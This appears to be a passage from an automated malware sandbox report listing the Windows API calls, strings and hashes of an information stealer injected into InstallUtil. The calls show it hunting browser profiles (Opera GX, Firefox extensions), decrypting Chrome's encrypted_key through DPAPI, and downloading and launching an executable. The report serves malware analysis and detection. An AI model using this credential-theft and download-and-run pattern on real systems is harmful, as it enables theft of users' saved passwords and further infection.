                                                                                                                  Similarity
                                                                                                                  • API ID: H_prolog3_catchlstrlen
                                                                                                                  • String ID: ERROR
                                                                                                                  • API String ID: 591506033-2861137601
                                                                                                                  APIs
                                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,=A,00000000,?), ref: 0041226C
                                                                                                                  • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00412287
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0041228E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                                                  • String ID: =A
                                                                                                                  • API String ID: 3183270410-2399317284
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                    • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                    • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                    • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                    • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                    • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                    • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                    • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                  • CopyFileA.KERNEL32(?,?,00000001), ref: 0040B3D7
                                                                                                                  • lstrlenA.KERNEL32(?), ref: 0040B529
                                                                                                                  • lstrlenA.KERNEL32(?), ref: 0040B544
                                                                                                                  • DeleteFileA.KERNEL32(?), ref: 0040B596
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 211194620-0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                    • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                                    • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                                    • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                                    • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                                    • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                                    • Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                    • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                    • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                    • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                    • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                    • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                    • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                  • StrStrA.SHLWAPI(00000000,?,00437538,0043688A), ref: 0040D49F
                                                                                                                  • lstrlenA.KERNEL32(?), ref: 0040D4B2
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrcpy$File$AllocLocallstrcatlstrlen$CloseCreateHandleReadSize
                                                                                                                  • String ID: ^userContextId=4294967295$moz-extension+++
                                                                                                                  • API String ID: 161838763-3310892237
                                                                                                                  • Opcode ID: 6aa37cb2f67db944989395a71283edee486ac6c96c9a46fa9e3a19fa612f2b1c
                                                                                                                  • Instruction ID: 85de75ec200c89e9111d7c6d064248f53d90c55406061a5cb20e0ca06024b096
                                                                                                                  • Opcode Fuzzy Hash: 6aa37cb2f67db944989395a71283edee486ac6c96c9a46fa9e3a19fa612f2b1c
                                                                                                                  • Instruction Fuzzy Hash: 15410B76A001199BCF10FBA6DD465CD77B5AF04308F51003AFD00B3192DBB8AE4D8AE9
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                    • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                                    • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                                    • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                                    • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                                    • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                                    • Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37
                                                                                                                  • StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0040CC90,?,?), ref: 004081E5
                                                                                                                    • Part of subcall function 00408048: CryptStringToBinaryA.CRYPT32($g@,00000000,00000001,00000000,?,00000000,00000000), ref: 00408060
                                                                                                                    • Part of subcall function 00408048: LocalAlloc.KERNEL32(00000040,?,?,?,00406724,?), ref: 0040806E
                                                                                                                    • Part of subcall function 00408048: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00408084
                                                                                                                    • Part of subcall function 00408048: LocalFree.KERNEL32(?,?,?,00406724,?), ref: 00408093
                                                                                                                    • Part of subcall function 004080A1: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0040823B), ref: 004080C4
                                                                                                                    • Part of subcall function 004080A1: LocalAlloc.KERNEL32(00000040,0040823B,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080D8
                                                                                                                    • Part of subcall function 004080A1: LocalFree.KERNEL32(0040CB95,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080FD
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Local$Alloc$CryptFile$BinaryFreeString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                                                                                                  • String ID: $"encrypted_key":"$DPAPI
                                                                                                                  • API String ID: 2311102621-738592651
                                                                                                                  • Opcode ID: 90210c10ee996d7ab5569050e076cca1abac48211b6b88e599488f63d6b1df73
                                                                                                                  • Instruction ID: d78dfd73ee8100a23edce15a91f2c70fa2f38e8288fa49592993377d3a11e596
                                                                                                                  • Opcode Fuzzy Hash: 90210c10ee996d7ab5569050e076cca1abac48211b6b88e599488f63d6b1df73
                                                                                                                  • Instruction Fuzzy Hash: 1121C232E40209ABDF14EB91DD41ADE7378AF41364F2045BFE950B72D1DF38AA49CA58
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                    • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                    • Part of subcall function 00405237: GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040527E
                                                                                                                    • Part of subcall function 00405237: RtlAllocateHeap.NTDLL(00000000), ref: 00405285
                                                                                                                    • Part of subcall function 00405237: InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 004052A7
                                                                                                                    • Part of subcall function 00405237: StrCmpCA.SHLWAPI(?), ref: 004052C1
                                                                                                                    • Part of subcall function 00405237: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004052F1
                                                                                                                    • Part of subcall function 00405237: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00405330
                                                                                                                    • Part of subcall function 00405237: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405360
                                                                                                                    • Part of subcall function 00405237: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040536B
                                                                                                                    • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                    • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                    • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                    • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                    • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                    • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                    • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                    • Part of subcall function 00412446: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00414A8D), ref: 00412460
                                                                                                                  • _memset.LIBCMT ref: 00412CDF
                                                                                                                  • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00436710), ref: 00412D31
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrcpy$Internet$CreateHeapHttpOpenProcessRequestlstrcat$AllocateConnectFileOptionSendSystemTime_memsetlstrlen
                                                                                                                  • String ID: .exe
                                                                                                                  • API String ID: 2831197775-4119554291
                                                                                                                  • Opcode ID: dca4419b34fce0c28ab30abb3e60bf27d84a7dc54cda20d1bfd4b76e486b6db5
                                                                                                                  • Instruction ID: b22801d522c47b455a3bf9a13fec4127fa4a3e5ad37381d5e28ead6c554ce160
                                                                                                                  • Opcode Fuzzy Hash: dca4419b34fce0c28ab30abb3e60bf27d84a7dc54cda20d1bfd4b76e486b6db5
                                                                                                                  • Instruction Fuzzy Hash: 87418472E00109BBDF11FBA6ED42ACE7375AF44308F110076F500B7191D6B86E8A8BD9
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                                  • lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 00416378
                                                                                                                  • lstrcatA.KERNEL32(?), ref: 00416396
                                                                                                                    • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416018
                                                                                                                    • Part of subcall function 00415FD1: FindFirstFileA.KERNEL32(?,?), ref: 0041602F
                                                                                                                    • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB4), ref: 00416050
                                                                                                                    • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB8), ref: 0041606A
                                                                                                                    • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416091
                                                                                                                    • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436647), ref: 004160A5
                                                                                                                    • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160C2
                                                                                                                    • Part of subcall function 00415FD1: PathMatchSpecA.SHLWAPI(?,?), ref: 004160EF
                                                                                                                    • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?), ref: 00416125
                                                                                                                    • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD0), ref: 00416137
                                                                                                                    • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 0041614A
                                                                                                                    • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD4), ref: 0041615C
                                                                                                                    • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 00416170
                                                                                                                    • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160D9
                                                                                                                    • Part of subcall function 00415FD1: CopyFileA.KERNEL32(?,?,00000001), ref: 00416229
                                                                                                                    • Part of subcall function 00415FD1: DeleteFileA.KERNEL32(?), ref: 0041629D
                                                                                                                    • Part of subcall function 00415FD1: FindNextFileA.KERNEL32(?,?), ref: 004162FF
                                                                                                                    • Part of subcall function 00415FD1: FindClose.KERNEL32(?), ref: 00416313
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                  • String ID: nzA
                                                                                                                  • API String ID: 2104210347-1761861442
                                                                                                                  • Opcode ID: b4da720962e9555cdd77b7fe306ab90caf7c41af40743b1f06eb89ecc5cf0673
                                                                                                                  • Instruction ID: 6a45041e7e61eaec4ac0428956384e3812b0c56a5955d947ae57416d2cc1f0af
                                                                                                                  • Opcode Fuzzy Hash: b4da720962e9555cdd77b7fe306ab90caf7c41af40743b1f06eb89ecc5cf0673
                                                                                                                  • Instruction Fuzzy Hash: DD31F77280010DEFDF15EB60DC43EE8377AEB08314F5440AEF606932A1EA769B919F55
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                    • Part of subcall function 00406963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
                                                                                                                    • Part of subcall function 00406963: StrCmpCA.SHLWAPI(?), ref: 004069DF
                                                                                                                    • Part of subcall function 00406963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
                                                                                                                    • Part of subcall function 00406963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
                                                                                                                    • Part of subcall function 00406963: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
                                                                                                                    • Part of subcall function 00406963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
                                                                                                                    • Part of subcall function 00406963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC
                                                                                                                  • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416873
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: HttpInternet$OpenRequest$ConnectInfoOptionQuerySendlstrcpy
                                                                                                                  • String ID: ERROR$ERROR
                                                                                                                  • API String ID: 3086566538-2579291623
                                                                                                                  • Opcode ID: 1f04a280a058e3c99f689a2c33220ef0c6b47f7de1e09031bce4c6852948f489
                                                                                                                  • Instruction ID: fa6cd13a443083575c3a824eeb1e5676c961334a8f4b47820412c2fdc9a040c1
                                                                                                                  • Opcode Fuzzy Hash: 1f04a280a058e3c99f689a2c33220ef0c6b47f7de1e09031bce4c6852948f489
                                                                                                                  • Instruction Fuzzy Hash: 6F014F75A00118ABCB20FB76D9469CD73A96F04308F55417BBC24E3293E7B8E9494AD9
                                                                                                                  APIs
                                                                                                                  • Sleep.KERNEL32(000003E8,?,?), ref: 00416EFE
                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateObjectSingleSleepThreadWait
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4198075804-0
                                                                                                                  • Opcode ID: a1dc13e99dd204c5a3461b4ea6d28ee21b2c0be54f1f4843eeff7d6218642cdc
                                                                                                                  • Instruction ID: 5b264aedade7dddb2649676fe5ff4aca135c6ea40ecc08e40dc523016e9b5da3
                                                                                                                  • Opcode Fuzzy Hash: a1dc13e99dd204c5a3461b4ea6d28ee21b2c0be54f1f4843eeff7d6218642cdc
                                                                                                                  • Instruction Fuzzy Hash: EC213B72900218ABCF14EF96E9459DE7BB9FF40358F11512BF904A3151D738EA86CF98
                                                                                                                  APIs
                                                                                                                  • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00414A8D), ref: 00412460
                                                                                                                  • WriteFile.KERNEL32(00000000,00000000,00414A8D,00414A8D,00000000,?,?,?,00414A8D), ref: 00412487
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00414A8D), ref: 0041249E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: File$CloseCreateHandleWrite
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1065093856-0
                                                                                                                  • Opcode ID: 618600667c8334e05266c7920bfcba6b014638909509334c775888355d968c7c
                                                                                                                  • Instruction ID: a587d297adf89e60fa6946fdd7da6f666782c0f167f87b21f29bcfda1cd19bad
                                                                                                                  • Opcode Fuzzy Hash: 618600667c8334e05266c7920bfcba6b014638909509334c775888355d968c7c
                                                                                                                  • Instruction Fuzzy Hash: 84F02471200118BFEF01AFA4DD8AFEF379CDF053A8F000022F951D6190D3A58D9157A5
                                                                                                                  APIs
                                                                                                                  • ?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C633095
                                                                                                                    • Part of subcall function 6C6335A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6C6BF688,00001000), ref: 6C6335D5
                                                                                                                    • Part of subcall function 6C6335A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C6335E0
                                                                                                                    • Part of subcall function 6C6335A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C6335FD
                                                                                                                    • Part of subcall function 6C6335A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C63363F
                                                                                                                    • Part of subcall function 6C6335A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C63369F
                                                                                                                    • Part of subcall function 6C6335A0: __aulldiv.LIBCMT ref: 6C6336E4
                                                                                                                  • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C63309F
                                                                                                                    • Part of subcall function 6C655B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C6556EE,?,00000001), ref: 6C655B85
                                                                                                                    • Part of subcall function 6C655B50: EnterCriticalSection.KERNEL32(6C6BF688,?,?,?,6C6556EE,?,00000001), ref: 6C655B90
                                                                                                                    • Part of subcall function 6C655B50: LeaveCriticalSection.KERNEL32(6C6BF688,?,?,?,6C6556EE,?,00000001), ref: 6C655BD8
                                                                                                                    • Part of subcall function 6C655B50: GetTickCount64.KERNEL32 ref: 6C655BE4
                                                                                                                  • ?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C6330BE
                                                                                                                    • Part of subcall function 6C6330F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C633127
                                                                                                                    • Part of subcall function 6C6330F0: __aulldiv.LIBCMT ref: 6C633140
                                                                                                                    • Part of subcall function 6C66AB2A: __onexit.LIBCMT ref: 6C66AB30
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492468765.000000006C631000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C630000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c630000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4291168024-0
                                                                                                                  • Opcode ID: 24183111232d19a8f63c4793b99bc33270f07ceee6873780b7deaf30f040ad83
                                                                                                                  • Instruction ID: c3b40ed250da526f26091d83108744386f3f93b09c7d449f8cb877643832744d
                                                                                                                  • Opcode Fuzzy Hash: 24183111232d19a8f63c4793b99bc33270f07ceee6873780b7deaf30f040ad83
                                                                                                                  • Instruction Fuzzy Hash: 44F0F91AE2074996CB10DF3A88D11E67370AF6B114F50232AEC4863531FB2061F883DF
                                                                                                                  APIs
                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,?,?,00401385), ref: 00410C98
                                                                                                                  • GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Heap$AllocateComputerNameProcess
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1664310425-0
                                                                                                                  • Opcode ID: 223c93d772ac102104f3d80f3225d4df8625dfe3dc4c13cc38eb63403da552c2
                                                                                                                  • Instruction ID: 4a48e0897f6a5e53a67cc5d7e0c14adbc6ce47083a4b6c26751418be0e4428b5
                                                                                                                  • Opcode Fuzzy Hash: 223c93d772ac102104f3d80f3225d4df8625dfe3dc4c13cc38eb63403da552c2
                                                                                                                  • Instruction Fuzzy Hash: 2DE08CB1200204BBD7449BD9AC8DF8A76BCDB84715F100226F605D6250EAB4C9848B68
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                  • StrCmpCA.SHLWAPI(?,Opera GX,00436853,0043684B,?,?,?), ref: 0040C98F
                                                                                                                    • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                                    • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                    • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                    • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                    • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                    • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                    • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                    • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                    • Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99
                                                                                                                    • Part of subcall function 0040819F: StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0040CC90,?,?), ref: 004081E5
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrcpy$lstrcat$AttributesFileFolderPathlstrlen
                                                                                                                  • String ID: Opera GX
                                                                                                                  • API String ID: 1719890681-3280151751
                                                                                                                  • Opcode ID: 60c01dc8b37e4b84b74df1fa8103c1199fcfef80998ad79c597a27a207442b16
                                                                                                                  • Instruction ID: 2f838092edd703084741f82f1e37e62fc4a331bb811b3281c0e98dae42c078f1
                                                                                                                  • Opcode Fuzzy Hash: 60c01dc8b37e4b84b74df1fa8103c1199fcfef80998ad79c597a27a207442b16
                                                                                                                  • Instruction Fuzzy Hash: 3FB1FD7294011DABCF10FFA6DE425CD7775AF04308F51013AF904771A1DBB8AE8A8B99
                                                                                                                  APIs
                                                                                                                  • VirtualProtect.KERNEL32(?,?,00000002,00000002,?,?,?,?,00407C56,?), ref: 00407B8A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ProtectVirtual
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 544645111-3916222277
                                                                                                                  • Opcode ID: 12037c8daa12d7fcab0069a5037541411d8429e4b00213a69a2087787070dd30
